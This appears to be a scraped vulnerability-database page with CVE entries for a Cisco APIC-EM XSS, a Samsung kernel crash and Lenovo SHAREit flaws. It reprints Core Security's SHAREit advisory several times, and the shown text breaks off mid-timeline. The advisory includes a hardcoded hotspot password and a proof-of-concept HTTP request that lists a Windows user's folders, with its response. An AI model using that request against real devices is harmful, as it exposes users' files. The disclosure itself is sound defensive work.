VARIoT IoT vulnerabilities database

Cross-site scripting (XSS) vulnerability in Cisco Application Policy Infrastructure Controller Enterprise Module (APIC-EM) 1.0.10 allows remote attackers to inject arbitrary web script or HTML via a crafted hostname in an SNMP response, aka Bug ID CSCuw47238. An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. This issue is being tracked by Cisco Bug IDs CSCuw47238

The getURL function in drivers/secfilter/urlparser.c in secfilter in the Samsung kernel for Android on SM-N9005 build N9005XXUGBOB6 (Note 3) and SM-G920F build G920FXXU2COH2 (Galaxy S6) devices allows attackers to trigger a NULL pointer dereference via a "GET HTTP/1.1" request, aka SVE-2016-5036. Vendors have confirmed this vulnerability SVE-2016-5036 It is released as.By the attacker, "GET HTTP/1.1" Via request NULL Pointer dereference may be triggered. SamsungNote3 and GalaxyS6 are both smartphones released by South Korea's Samsung. There are security vulnerabilities in SamsungNote3 and GalaxyS6. There are security flaws in the Samsung Note 3 and Galaxy S6

The Wifi hotspot in Lenovo SHAREit before 3.2.0 for Windows, when configured to receive files, has a hardcoded password of 12345678, which makes it easier for remote attackers to obtain access by leveraging a position within the WLAN coverage area. Lenovo ShareIT is prone to multiple security vulnerabilities. An attacker can exploit these issues to bypass certain security restrictions and gain access to sensitive information, to perform man-in-the-middle attacks and bypass authorization mechanism. Lenovo SHAREit (Eggplant Express) for Windows is a set of file sharing software based on Windows system of China Lenovo (Lenovo). There is a security vulnerability in the Wifi hotspot component of Lenovo SHAREit for Windows versions earlier than 3.2.0. A remote attacker could exploit this vulnerability using a location within WLAN coverage to gain access. 1. Advisory Information Title: Lenovo ShareIT Multiple Vulnerabilities Advisory ID: CORE-2016-0002 Advisory URL: http://www.coresecurity.com/advisories/lenovo-shareit-multiple-vulnerabilities Date published: 2016-01-25 Date of last update: 2016-01-22 Vendors contacted: Lenovo Release mode: Coordinated release 2. Vulnerability Information Class: Use of Hard-coded Password [CWE-259], Information Exposure [CWE-200], Missing Encryption of Sensitive Data [CWE-311], Missing Authorization [CWE-862] Impact: Security bypass, Information leak Remotely Exploitable: Yes Locally Exploitable: No CVE Name: CVE-2016-1491, CVE-2016-1490, CVE-2016-1489, CVE-2016-1492 3. Vulnerability Description SHAREit [1] is a free application from Lenovo [2] that lets you easily share files and folders among smartphones, tablets, and personal computers. 4. Vulnerable Packages Lenovo SHAREit for Android 3.0.18_ww Lenovo SHAREit for Windows 2.5.1.1 Other products and versions may also be affected, but they were not tested. 5. Vendor Information, Solutions and Workarounds Lenovo released an updated version of Lenovo SHAREit for Windows and Android that fix the reported issues. The new version of the products can be found here [1]. 6. Credits This vulnerability was discovered and researched by Ivan Huertas from Core Security Consulting Team. The publication of this advisory was coordinated by Joaquín Rodríguez Varela from Core Security Advisories Team. 7. Technical Description / Proof of Concept Code 7.1. Any system with a Wifi Network card could connect to that Hotspot by using that password. The password is always the same. 7.2. Remote browsing of file system on Lenovo SHAREit for Windows [CVE-2016-1490] When the WiFi network is on and connected with the default password (12345678), the files can be browsed but not downloaded by performing an HTTP Request to the WebServer launched by Lenovo SHAREit. The following request was used to perform this action: POST /list?type=file&path=C%3A%5CUsers\admin HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Dalvik/1.6.0 (Linux; U; Android 4.4.4; XT1032 Build/KXB21.14-L1.40) Host: 192.168.173.1:2999 Connection: Keep-Alivek Accept-Encoding: gzip Content-Length: 0 HTTP/1.0 200 OK Content-Length: 2426 {"containers":[{"filepath":"C:\\Users\\admin\\Contacts","has_thumbnail":false,"id":"C:\\Users\\admin\\Contacts","isloaded":false,"isroot":false,"isvolume":false,"name":"Contacts","type":"file","ver":""},{"filepath":"C:\\Users\\admin\\Desktop","has_thumbnail":false,"id":"C:\\Users\\admin\\Desktop","isloaded":false,"isroot":false,"isvolume":false,"name":"Desktop","type":"file","ver":""},{"filepath":"C:\\Users\\admin\\Documents","has_thumbnail":false,"id":"C:\\Users\\admin\\Documents","isloaded":false,"isroot":false,"isvolume":false,"name":"Documents","type":"file","ver":""},{"filepath":"C:\\Users\\admin\\Downloads","has_thumbnail":false,"id":"C:\\Users\\admin\\Downloads","isloaded":false,"isroot":false,"isvolume":false,"name":"Downloads","type":"file","ver":""},{"filepath":"C:\\Users\\admin\\Favorites","has_thumbnail":false,"id":"C:\\Users\\admin\\Favorites","isloaded":false,"isroot":false,"isvolume":false,"name":"Favorites","type":"file","ver":""},{"filepath":"C:\\Users\\admin\\Links", "has_thumbnail":false,"id":"C:\\Users\\admin\\Links","isloaded":false,"isroot":false,"isvolume":false,"name":"Links","type":"file","ver":""},{"filepath":"C:\\Users\\admin\\Music","has_thumbnail":false,"id":"C:\\Users\\admin\\Music","isloaded":false,"isroot":false,"isvolume":false,"name":"My Music","type":"file","ver":""},{"filepath":"C:\\Users\\admin\\Pictures","has_thumbnail":false,"id":"C:\\Users\\admin\\Pictures","isloaded":false,"isroot":false,"isvolume":false,"name":"My Pictures","type":"file","ver":""},{"filepath":"C:\\Users\\admin\\Saved Games","has_thumbnail":false,"id":"C:\\Users\\admin\\Saved Games","isloaded":false,"isroot":false,"isvolume":false,"name":"Saved Games","type":"file","ver":""},{"filepath":"C:\\Users\\admin\\Searches","has_thumbnail":false,"id":"C:\\Users\\admin\\Searches","isloaded":false,"isroot":false,"isvolume":false,"name":"Searches","type":"file","ver":""},{"filepath":"C:\\Users\\admin\\Tracing","has_thumbnail":false,"id":"C:\\Users\\admin\\Tracing","isloaded":false,"isroot":false,"isvolume":false,"name":"Tracing","type":"file","ver":""},{"filepath":"C:\\Users\\admin\\Videos","has_thumbnail":false,"id":"C:\\Users\\admin\\Videos","isloaded":false,"isroot":false,"isvolume":false,"name":"My ","type":"file","ver":""}],"filepath":"C:\\Users\\admin","has_thumbnail":false,"id":"C:\\Users\\admin","isloaded":true,"isroot":false,"isvolume":false,"name":"admin","type":"file","ver":""} 7.3. Files transferred in plain text in Windows and Android version of Lenovo SHAREit [CVE-2016-1489] The files are transfered via HTTP without encryption. An attacker that is able to sniff the network traffic could to view the data transferred or perform man in the middle attacks, for example by modifying the content of the transferred files. 7.4. An attacker could connect to that HotSpot and capture the information transferred between those devices. 8. Report Timeline 2015-10-29: Core Security sent an initial notification to Lenovo. 2015-10-29: Lenovo replied attaching their public PGP key. 2015-10-29: Core Security sent Lenovo a draft version of the advisory and requested a tentative day for the release of the patched version. 2015-10-29: Lenovo replied their development team would review Core Security findings. 2015-11-06: Lenovo informed that they would like to discuss their progress in a telephone meeting. 2015-11-06: Core Security replied Lenovo that is our policy not to have such communications in order to always keep a log of all interactions with the vendor. 2015-11-06: Lenovo replied they understood Core Security policy and asked if the first disclosure date was negotiable. 2015-11-06: Core Security replied Lenovo that the date was negotiable, being the priority to make a coordinated release. 2015-11-13: Lenovo informed Core Security they had addressed the Windows version issues and could share a beta fix for us to validate. They informed as well that the development team would continue to investigate the Android version issues. 2015-11-20: Lenovo asked Core Security for feedback regarding their beta fix. 2015-11-20: Core Security replied saying there was a small delay in the review of the beta fix and informed Lenovo they would send a reply next week. 2015-11-20: Lenovo asked Core Security to confirm that the publication date of the advisory was not going to be on November 30, and asked to seek an agreement regarding a specific date. 2015-11-23: Core Security replied stating that they were not going to publish their findings on November 30, and the idea was to coordinate a schedule according to the release date of the corrected versions. Additionally, Core Security informed Lenovo regarding the beta fix, which was still using the hardcoded password. 2015-11-23: Lenovo informed Core Security that they had forwarded Core's analysis to their development team. 2015-11-25: Lenovo informed Core Security that they considered that issue as resolved considering that the hardcoded password was not present in the "secure mode" and only used in the "easy mode". 2015-12-06: Lenovo informed Core Security that they were still working on the schedule. 2015-12-07: Lenovo informed Core Security that they were targeting to release the updated Windows version on January 10 and that they would continue working with their third party partner for the Android version release. 2016-01-04: Core Security asked Lenovo if the publication date could be moved from Sunday 10 to Monday 11 of January. 2016-01-04: Lenovo asked Core Security for more specific justifications for not releasing on a Sunday. 2016-01-05: Core Security informed Lenovo that is always recommend to publish on a working day in order to give enough time to the affected users to update their products (particularly corporate users) and avoid explotations of the published flaws by malicious users on the weekend. 2016-01-05: Lenovo informed Core Security that they agreed to publish on Monday 11 but that they hadn't planned a date for their advisory disclosure. 2016-01-05: Core Security informed Lenovo that our advisory would be published the same day as the release of the new version. 2015-01-05: Lenovo informed Core Security that they would publish their advisory concurrently with Core's advisory. Lenovo requested a draft version of the advisory in order to ensure consistency among publications. They asked how Core would like to be acknowledged in their advisory and offered additional publication dates in case they couldn't meet the Monday 11 deadline. 2016-01-05: Core Security informed Lenovo that the additional publication dates ares acceptable if Core is informed with time of such changes. We informed that we would send them a draft of the advisory once it was completed and sent them the acknowledgment line as requested. 2016-01-06: Core Security sent Lenovo the draft version of the advisory. 2016-01-08: Lenovo informed Core Security that due they discovered additional vulnerabilities they requested to address both platform issues together. Additionaly thay requested an extension to the publication date to mid-February and a possibility to keep updating Lenovo SHAREit. 2016-01-08: Core Security informed Lenovo that it was our first request to address all vulnerabilities in one advisory. Additinally we requested to know which vulnerabilities they were planning to address, and if those included any of the reported by us. We expressed our willingness to extend the deadline even though the maximum 3 months period we define was already over. 2016-01-08: Lenovo informed Core Security that they intend to address al the reported vulnerabilities by us and requested confimration on extending the date of our joint disclosure to mid-February 2016-01-08: Core Security informed Lenovo that we wanted to know exactly when each vulnerability was going to be addressed in advanced in order to agree to extend the date of our joint disclosure. 2016-01-08: Lenovo informed Core Security that they agreed to our terms. 2016-01-14: Lenovo informed Core Security that they were going to publish the new versions for both platforms addressing all the reported vulnerabilities on January 15 and expected to release the joint disclosure on mid-February. 2016-01-14: Core Security informed Lenovo that is our policy to disclose our findings once the new version correcting the issues becomes available. We informed them that if that was going to happen the following day, we would be forced to publish our security advisory the following day as well. 2016-01-15: Lenovo informed Core Security that they misunderstood our disclosure policy. They informed us that they would probably be publishing the following week and no later than January 22. 2016-01-15: Core Security informed Lenovo that we commited to a joint security disclosure the day the software releases went live and requested an advanced notice as soon as they could. 2016-01-19: Lenovo informed Core Security that they agreed to our request. 2016-01-20: Core Security informed Lenovo that they would be publishing both versions on Friday 22 of January. 2016-01-20: Core Security requested Lenovo to release the updates on Monday 25 of January as it was recommended before in order to give the affected users enough working days to download and install the new version. 2016-01-21: Lenovo informed Core Security that they agreed to release on Monday, January 25. They also informed that they would be publishing their security advisory as well. 2016-01-25: Advisory CORE-2016-0002 published. 9. References [1] http://shareit.lenovo.com/#DOWNLOAD. [2] http://www.lenovo.com. 10. About CoreLabs CoreLabs, the research center of Core Security, is charged with anticipating the future needs and requirements for information security technologies. We conduct our research in several important areas of computer security including system vulnerabilities, cyber attack planning and simulation, source code auditing, and cryptography. Our results include problem formalization, identification of vulnerabilities, novel solutions and prototypes for new technologies. CoreLabs regularly publishes security advisories, technical papers, project information and shared software tools for public use at: http://corelabs.coresecurity.com. 11. About Core Security Technologies Core Security Technologies enables organizations to get ahead of threats with security test and measurement solutions that continuously identify and demonstrate real-world exposures to their most critical assets. Our customers can gain real visibility into their security standing, real validation of their security controls, and real metrics to more effectively secure their organizations. Core Security's software solutions build on over a decade of trusted research and leading-edge threat expertise from the company's Security Consulting Services, CoreLabs and Engineering groups. Core Security Technologies can be reached at +1 (617) 399-6980 or on the Web at: http://www.coresecurity.com. 12. Disclaimer The contents of this advisory are copyright (c) 2015 Core Security and (c) 2015 CoreLabs, and are licensed under a Creative Commons Attribution Non-Commercial Share-Alike 3.0 (United States) License: http://creativecommons.org/licenses/by-nc-sa/3.0/us/ 13. PGP/GPG Keys This advisory has been signed with the GPG key of Core Security advisories team, which is available for download at http://www.coresecurity.com/files/attachments/core_security_advisories.asc

The Wifi hotspot in Lenovo SHAREit before 3.5.48_ww for Android, when configured to receive files, does not require a password, which makes it easier for remote attackers to obtain access by leveraging a position within the WLAN coverage area. Supplementary information : CWE Vulnerability type by CWE-284: Improper Access Control ( Inappropriate access control ) Has been identified. http://cwe.mitre.org/data/definitions/284.htmlWireless by a third party LAN (WLAN) Access rights may be obtained by using the location within the reception area. Lenovo ShareIT is prone to multiple security vulnerabilities. An attacker can exploit these issues to bypass certain security restrictions and gain access to sensitive information, to perform man-in-the-middle attacks and bypass authorization mechanism. Lenovo SHAREit (Eggplant Express) for Android is a set of file sharing software based on the Android system of China Lenovo (Lenovo). There is a security vulnerability in the Wifi hotspot component of Lenovo SHAREit for Android versions earlier than 3.5.48_ww. The vulnerability stems from the fact that the program does not ask for a password when it is used to receive files. 1. Advisory Information Title: Lenovo ShareIT Multiple Vulnerabilities Advisory ID: CORE-2016-0002 Advisory URL: http://www.coresecurity.com/advisories/lenovo-shareit-multiple-vulnerabilities Date published: 2016-01-25 Date of last update: 2016-01-22 Vendors contacted: Lenovo Release mode: Coordinated release 2. Vulnerability Information Class: Use of Hard-coded Password [CWE-259], Information Exposure [CWE-200], Missing Encryption of Sensitive Data [CWE-311], Missing Authorization [CWE-862] Impact: Security bypass, Information leak Remotely Exploitable: Yes Locally Exploitable: No CVE Name: CVE-2016-1491, CVE-2016-1490, CVE-2016-1489, CVE-2016-1492 3. Vulnerability Description SHAREit [1] is a free application from Lenovo [2] that lets you easily share files and folders among smartphones, tablets, and personal computers. 4. Vulnerable Packages Lenovo SHAREit for Android 3.0.18_ww Lenovo SHAREit for Windows 2.5.1.1 Other products and versions may also be affected, but they were not tested. 5. Vendor Information, Solutions and Workarounds Lenovo released an updated version of Lenovo SHAREit for Windows and Android that fix the reported issues. The new version of the products can be found here [1]. 6. Credits This vulnerability was discovered and researched by Ivan Huertas from Core Security Consulting Team. The publication of this advisory was coordinated by Joaquín Rodríguez Varela from Core Security Advisories Team. 7. Technical Description / Proof of Concept Code 7.1. Any system with a Wifi Network card could connect to that Hotspot by using that password. The password is always the same. 7.2. Remote browsing of file system on Lenovo SHAREit for Windows [CVE-2016-1490] When the WiFi network is on and connected with the default password (12345678), the files can be browsed but not downloaded by performing an HTTP Request to the WebServer launched by Lenovo SHAREit. The following request was used to perform this action: POST /list?type=file&path=C%3A%5CUsers\admin HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Dalvik/1.6.0 (Linux; U; Android 4.4.4; XT1032 Build/KXB21.14-L1.40) Host: 192.168.173.1:2999 Connection: Keep-Alivek Accept-Encoding: gzip Content-Length: 0 HTTP/1.0 200 OK Content-Length: 2426 {"containers":[{"filepath":"C:\\Users\\admin\\Contacts","has_thumbnail":false,"id":"C:\\Users\\admin\\Contacts","isloaded":false,"isroot":false,"isvolume":false,"name":"Contacts","type":"file","ver":""},{"filepath":"C:\\Users\\admin\\Desktop","has_thumbnail":false,"id":"C:\\Users\\admin\\Desktop","isloaded":false,"isroot":false,"isvolume":false,"name":"Desktop","type":"file","ver":""},{"filepath":"C:\\Users\\admin\\Documents","has_thumbnail":false,"id":"C:\\Users\\admin\\Documents","isloaded":false,"isroot":false,"isvolume":false,"name":"Documents","type":"file","ver":""},{"filepath":"C:\\Users\\admin\\Downloads","has_thumbnail":false,"id":"C:\\Users\\admin\\Downloads","isloaded":false,"isroot":false,"isvolume":false,"name":"Downloads","type":"file","ver":""},{"filepath":"C:\\Users\\admin\\Favorites","has_thumbnail":false,"id":"C:\\Users\\admin\\Favorites","isloaded":false,"isroot":false,"isvolume":false,"name":"Favorites","type":"file","ver":""},{"filepath":"C:\\Users\\admin\\Links", "has_thumbnail":false,"id":"C:\\Users\\admin\\Links","isloaded":false,"isroot":false,"isvolume":false,"name":"Links","type":"file","ver":""},{"filepath":"C:\\Users\\admin\\Music","has_thumbnail":false,"id":"C:\\Users\\admin\\Music","isloaded":false,"isroot":false,"isvolume":false,"name":"My Music","type":"file","ver":""},{"filepath":"C:\\Users\\admin\\Pictures","has_thumbnail":false,"id":"C:\\Users\\admin\\Pictures","isloaded":false,"isroot":false,"isvolume":false,"name":"My Pictures","type":"file","ver":""},{"filepath":"C:\\Users\\admin\\Saved Games","has_thumbnail":false,"id":"C:\\Users\\admin\\Saved Games","isloaded":false,"isroot":false,"isvolume":false,"name":"Saved Games","type":"file","ver":""},{"filepath":"C:\\Users\\admin\\Searches","has_thumbnail":false,"id":"C:\\Users\\admin\\Searches","isloaded":false,"isroot":false,"isvolume":false,"name":"Searches","type":"file","ver":""},{"filepath":"C:\\Users\\admin\\Tracing","has_thumbnail":false,"id":"C:\\Users\\admin\\Tracing","isloaded":false,"isroot":false,"isvolume":false,"name":"Tracing","type":"file","ver":""},{"filepath":"C:\\Users\\admin\\Videos","has_thumbnail":false,"id":"C:\\Users\\admin\\Videos","isloaded":false,"isroot":false,"isvolume":false,"name":"My ","type":"file","ver":""}],"filepath":"C:\\Users\\admin","has_thumbnail":false,"id":"C:\\Users\\admin","isloaded":true,"isroot":false,"isvolume":false,"name":"admin","type":"file","ver":""} 7.3. Files transferred in plain text in Windows and Android version of Lenovo SHAREit [CVE-2016-1489] The files are transfered via HTTP without encryption. An attacker that is able to sniff the network traffic could to view the data transferred or perform man in the middle attacks, for example by modifying the content of the transferred files. 7.4. An attacker could connect to that HotSpot and capture the information transferred between those devices. 8. Report Timeline 2015-10-29: Core Security sent an initial notification to Lenovo. 2015-10-29: Lenovo replied attaching their public PGP key. 2015-10-29: Core Security sent Lenovo a draft version of the advisory and requested a tentative day for the release of the patched version. 2015-10-29: Lenovo replied their development team would review Core Security findings. 2015-11-06: Lenovo informed that they would like to discuss their progress in a telephone meeting. 2015-11-06: Core Security replied Lenovo that is our policy not to have such communications in order to always keep a log of all interactions with the vendor. 2015-11-06: Lenovo replied they understood Core Security policy and asked if the first disclosure date was negotiable. 2015-11-06: Core Security replied Lenovo that the date was negotiable, being the priority to make a coordinated release. 2015-11-13: Lenovo informed Core Security they had addressed the Windows version issues and could share a beta fix for us to validate. They informed as well that the development team would continue to investigate the Android version issues. 2015-11-20: Lenovo asked Core Security for feedback regarding their beta fix. 2015-11-20: Core Security replied saying there was a small delay in the review of the beta fix and informed Lenovo they would send a reply next week. 2015-11-20: Lenovo asked Core Security to confirm that the publication date of the advisory was not going to be on November 30, and asked to seek an agreement regarding a specific date. 2015-11-23: Core Security replied stating that they were not going to publish their findings on November 30, and the idea was to coordinate a schedule according to the release date of the corrected versions. Additionally, Core Security informed Lenovo regarding the beta fix, which was still using the hardcoded password. 2015-11-23: Lenovo informed Core Security that they had forwarded Core's analysis to their development team. 2015-11-25: Lenovo informed Core Security that they considered that issue as resolved considering that the hardcoded password was not present in the "secure mode" and only used in the "easy mode". 2015-12-06: Lenovo informed Core Security that they were still working on the schedule. 2015-12-07: Lenovo informed Core Security that they were targeting to release the updated Windows version on January 10 and that they would continue working with their third party partner for the Android version release. 2016-01-04: Core Security asked Lenovo if the publication date could be moved from Sunday 10 to Monday 11 of January. 2016-01-04: Lenovo asked Core Security for more specific justifications for not releasing on a Sunday. 2016-01-05: Core Security informed Lenovo that is always recommend to publish on a working day in order to give enough time to the affected users to update their products (particularly corporate users) and avoid explotations of the published flaws by malicious users on the weekend. 2016-01-05: Lenovo informed Core Security that they agreed to publish on Monday 11 but that they hadn't planned a date for their advisory disclosure. 2016-01-05: Core Security informed Lenovo that our advisory would be published the same day as the release of the new version. 2015-01-05: Lenovo informed Core Security that they would publish their advisory concurrently with Core's advisory. Lenovo requested a draft version of the advisory in order to ensure consistency among publications. They asked how Core would like to be acknowledged in their advisory and offered additional publication dates in case they couldn't meet the Monday 11 deadline. 2016-01-05: Core Security informed Lenovo that the additional publication dates ares acceptable if Core is informed with time of such changes. We informed that we would send them a draft of the advisory once it was completed and sent them the acknowledgment line as requested. 2016-01-06: Core Security sent Lenovo the draft version of the advisory. 2016-01-08: Lenovo informed Core Security that due they discovered additional vulnerabilities they requested to address both platform issues together. Additionaly thay requested an extension to the publication date to mid-February and a possibility to keep updating Lenovo SHAREit. 2016-01-08: Core Security informed Lenovo that it was our first request to address all vulnerabilities in one advisory. Additinally we requested to know which vulnerabilities they were planning to address, and if those included any of the reported by us. We expressed our willingness to extend the deadline even though the maximum 3 months period we define was already over. 2016-01-08: Lenovo informed Core Security that they intend to address al the reported vulnerabilities by us and requested confimration on extending the date of our joint disclosure to mid-February 2016-01-08: Core Security informed Lenovo that we wanted to know exactly when each vulnerability was going to be addressed in advanced in order to agree to extend the date of our joint disclosure. 2016-01-08: Lenovo informed Core Security that they agreed to our terms. 2016-01-14: Lenovo informed Core Security that they were going to publish the new versions for both platforms addressing all the reported vulnerabilities on January 15 and expected to release the joint disclosure on mid-February. 2016-01-14: Core Security informed Lenovo that is our policy to disclose our findings once the new version correcting the issues becomes available. We informed them that if that was going to happen the following day, we would be forced to publish our security advisory the following day as well. 2016-01-15: Lenovo informed Core Security that they misunderstood our disclosure policy. They informed us that they would probably be publishing the following week and no later than January 22. 2016-01-15: Core Security informed Lenovo that we commited to a joint security disclosure the day the software releases went live and requested an advanced notice as soon as they could. 2016-01-19: Lenovo informed Core Security that they agreed to our request. 2016-01-20: Core Security informed Lenovo that they would be publishing both versions on Friday 22 of January. 2016-01-20: Core Security requested Lenovo to release the updates on Monday 25 of January as it was recommended before in order to give the affected users enough working days to download and install the new version. 2016-01-21: Lenovo informed Core Security that they agreed to release on Monday, January 25. They also informed that they would be publishing their security advisory as well. 2016-01-25: Advisory CORE-2016-0002 published. 9. References [1] http://shareit.lenovo.com/#DOWNLOAD. [2] http://www.lenovo.com. 10. About CoreLabs CoreLabs, the research center of Core Security, is charged with anticipating the future needs and requirements for information security technologies. We conduct our research in several important areas of computer security including system vulnerabilities, cyber attack planning and simulation, source code auditing, and cryptography. Our results include problem formalization, identification of vulnerabilities, novel solutions and prototypes for new technologies. CoreLabs regularly publishes security advisories, technical papers, project information and shared software tools for public use at: http://corelabs.coresecurity.com. 11. About Core Security Technologies Core Security Technologies enables organizations to get ahead of threats with security test and measurement solutions that continuously identify and demonstrate real-world exposures to their most critical assets. Our customers can gain real visibility into their security standing, real validation of their security controls, and real metrics to more effectively secure their organizations. Core Security's software solutions build on over a decade of trusted research and leading-edge threat expertise from the company's Security Consulting Services, CoreLabs and Engineering groups. Core Security Technologies can be reached at +1 (617) 399-6980 or on the Web at: http://www.coresecurity.com. 12. Disclaimer The contents of this advisory are copyright (c) 2015 Core Security and (c) 2015 CoreLabs, and are licensed under a Creative Commons Attribution Non-Commercial Share-Alike 3.0 (United States) License: http://creativecommons.org/licenses/by-nc-sa/3.0/us/ 13. PGP/GPG Keys This advisory has been signed with the GPG key of Core Security advisories team, which is available for download at http://www.coresecurity.com/files/attachments/core_security_advisories.asc

The Wifi hotspot in Lenovo SHAREit before 3.2.0 for Windows allows remote attackers to obtain sensitive file names via a crafted file request to /list. Lenovo ShareIT is prone to multiple security vulnerabilities. An attacker can exploit these issues to bypass certain security restrictions and gain access to sensitive information, to perform man-in-the-middle attacks and bypass authorization mechanism. Lenovo SHAREit (Eggplant Express) for Windows is a set of file sharing software based on Windows system of China Lenovo (Lenovo). There is a security vulnerability in the Wifi hotspot component of Lenovo SHAREit for Windows versions earlier than 3.2.0. 1. Advisory Information Title: Lenovo ShareIT Multiple Vulnerabilities Advisory ID: CORE-2016-0002 Advisory URL: http://www.coresecurity.com/advisories/lenovo-shareit-multiple-vulnerabilities Date published: 2016-01-25 Date of last update: 2016-01-22 Vendors contacted: Lenovo Release mode: Coordinated release 2. Vulnerability Information Class: Use of Hard-coded Password [CWE-259], Information Exposure [CWE-200], Missing Encryption of Sensitive Data [CWE-311], Missing Authorization [CWE-862] Impact: Security bypass, Information leak Remotely Exploitable: Yes Locally Exploitable: No CVE Name: CVE-2016-1491, CVE-2016-1490, CVE-2016-1489, CVE-2016-1492 3. Vulnerability Description SHAREit [1] is a free application from Lenovo [2] that lets you easily share files and folders among smartphones, tablets, and personal computers. 4. Vulnerable Packages Lenovo SHAREit for Android 3.0.18_ww Lenovo SHAREit for Windows 2.5.1.1 Other products and versions may also be affected, but they were not tested. 5. Vendor Information, Solutions and Workarounds Lenovo released an updated version of Lenovo SHAREit for Windows and Android that fix the reported issues. The new version of the products can be found here [1]. 6. Credits This vulnerability was discovered and researched by Ivan Huertas from Core Security Consulting Team. The publication of this advisory was coordinated by Joaquín Rodríguez Varela from Core Security Advisories Team. 7. Technical Description / Proof of Concept Code 7.1. Hard-coded password in Lenovo SHAREit for Windows [CVE-2016-1491] When Lenovo SHAREit for Windows is configured to receive files, a Wifi HotSpot is set with an easy password (12345678). Any system with a Wifi Network card could connect to that Hotspot by using that password. The password is always the same. 7.2. The following request was used to perform this action: POST /list?type=file&path=C%3A%5CUsers\admin HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Dalvik/1.6.0 (Linux; U; Android 4.4.4; XT1032 Build/KXB21.14-L1.40) Host: 192.168.173.1:2999 Connection: Keep-Alivek Accept-Encoding: gzip Content-Length: 0 HTTP/1.0 200 OK Content-Length: 2426 {"containers":[{"filepath":"C:\\Users\\admin\\Contacts","has_thumbnail":false,"id":"C:\\Users\\admin\\Contacts","isloaded":false,"isroot":false,"isvolume":false,"name":"Contacts","type":"file","ver":""},{"filepath":"C:\\Users\\admin\\Desktop","has_thumbnail":false,"id":"C:\\Users\\admin\\Desktop","isloaded":false,"isroot":false,"isvolume":false,"name":"Desktop","type":"file","ver":""},{"filepath":"C:\\Users\\admin\\Documents","has_thumbnail":false,"id":"C:\\Users\\admin\\Documents","isloaded":false,"isroot":false,"isvolume":false,"name":"Documents","type":"file","ver":""},{"filepath":"C:\\Users\\admin\\Downloads","has_thumbnail":false,"id":"C:\\Users\\admin\\Downloads","isloaded":false,"isroot":false,"isvolume":false,"name":"Downloads","type":"file","ver":""},{"filepath":"C:\\Users\\admin\\Favorites","has_thumbnail":false,"id":"C:\\Users\\admin\\Favorites","isloaded":false,"isroot":false,"isvolume":false,"name":"Favorites","type":"file","ver":""},{"filepath":"C:\\Users\\admin\\Links", "has_thumbnail":false,"id":"C:\\Users\\admin\\Links","isloaded":false,"isroot":false,"isvolume":false,"name":"Links","type":"file","ver":""},{"filepath":"C:\\Users\\admin\\Music","has_thumbnail":false,"id":"C:\\Users\\admin\\Music","isloaded":false,"isroot":false,"isvolume":false,"name":"My Music","type":"file","ver":""},{"filepath":"C:\\Users\\admin\\Pictures","has_thumbnail":false,"id":"C:\\Users\\admin\\Pictures","isloaded":false,"isroot":false,"isvolume":false,"name":"My Pictures","type":"file","ver":""},{"filepath":"C:\\Users\\admin\\Saved Games","has_thumbnail":false,"id":"C:\\Users\\admin\\Saved Games","isloaded":false,"isroot":false,"isvolume":false,"name":"Saved Games","type":"file","ver":""},{"filepath":"C:\\Users\\admin\\Searches","has_thumbnail":false,"id":"C:\\Users\\admin\\Searches","isloaded":false,"isroot":false,"isvolume":false,"name":"Searches","type":"file","ver":""},{"filepath":"C:\\Users\\admin\\Tracing","has_thumbnail":false,"id":"C:\\Users\\admin\\Tracing","isloaded":false,"isroot":false,"isvolume":false,"name":"Tracing","type":"file","ver":""},{"filepath":"C:\\Users\\admin\\Videos","has_thumbnail":false,"id":"C:\\Users\\admin\\Videos","isloaded":false,"isroot":false,"isvolume":false,"name":"My ","type":"file","ver":""}],"filepath":"C:\\Users\\admin","has_thumbnail":false,"id":"C:\\Users\\admin","isloaded":true,"isroot":false,"isvolume":false,"name":"admin","type":"file","ver":""} 7.3. Files transferred in plain text in Windows and Android version of Lenovo SHAREit [CVE-2016-1489] The files are transfered via HTTP without encryption. An attacker that is able to sniff the network traffic could to view the data transferred or perform man in the middle attacks, for example by modifying the content of the transferred files. 7.4. Open WiFi Network defined on Android devices [CVE-2016-1492] When the application is configured to receive files, an open Wifi HotSpot is created without any password. An attacker could connect to that HotSpot and capture the information transferred between those devices. 8. Report Timeline 2015-10-29: Core Security sent an initial notification to Lenovo. 2015-10-29: Lenovo replied attaching their public PGP key. 2015-10-29: Core Security sent Lenovo a draft version of the advisory and requested a tentative day for the release of the patched version. 2015-10-29: Lenovo replied their development team would review Core Security findings. 2015-11-06: Lenovo informed that they would like to discuss their progress in a telephone meeting. 2015-11-06: Core Security replied Lenovo that is our policy not to have such communications in order to always keep a log of all interactions with the vendor. 2015-11-06: Lenovo replied they understood Core Security policy and asked if the first disclosure date was negotiable. 2015-11-06: Core Security replied Lenovo that the date was negotiable, being the priority to make a coordinated release. 2015-11-13: Lenovo informed Core Security they had addressed the Windows version issues and could share a beta fix for us to validate. They informed as well that the development team would continue to investigate the Android version issues. 2015-11-20: Lenovo asked Core Security for feedback regarding their beta fix. 2015-11-20: Core Security replied saying there was a small delay in the review of the beta fix and informed Lenovo they would send a reply next week. 2015-11-20: Lenovo asked Core Security to confirm that the publication date of the advisory was not going to be on November 30, and asked to seek an agreement regarding a specific date. 2015-11-23: Core Security replied stating that they were not going to publish their findings on November 30, and the idea was to coordinate a schedule according to the release date of the corrected versions. Additionally, Core Security informed Lenovo regarding the beta fix, which was still using the hardcoded password. 2015-11-23: Lenovo informed Core Security that they had forwarded Core's analysis to their development team. 2015-11-25: Lenovo informed Core Security that they considered that issue as resolved considering that the hardcoded password was not present in the "secure mode" and only used in the "easy mode". 2015-12-06: Lenovo informed Core Security that they were still working on the schedule. 2015-12-07: Lenovo informed Core Security that they were targeting to release the updated Windows version on January 10 and that they would continue working with their third party partner for the Android version release. 2016-01-04: Core Security asked Lenovo if the publication date could be moved from Sunday 10 to Monday 11 of January. 2016-01-04: Lenovo asked Core Security for more specific justifications for not releasing on a Sunday. 2016-01-05: Core Security informed Lenovo that is always recommend to publish on a working day in order to give enough time to the affected users to update their products (particularly corporate users) and avoid explotations of the published flaws by malicious users on the weekend. 2016-01-05: Lenovo informed Core Security that they agreed to publish on Monday 11 but that they hadn't planned a date for their advisory disclosure. 2016-01-05: Core Security informed Lenovo that our advisory would be published the same day as the release of the new version. 2015-01-05: Lenovo informed Core Security that they would publish their advisory 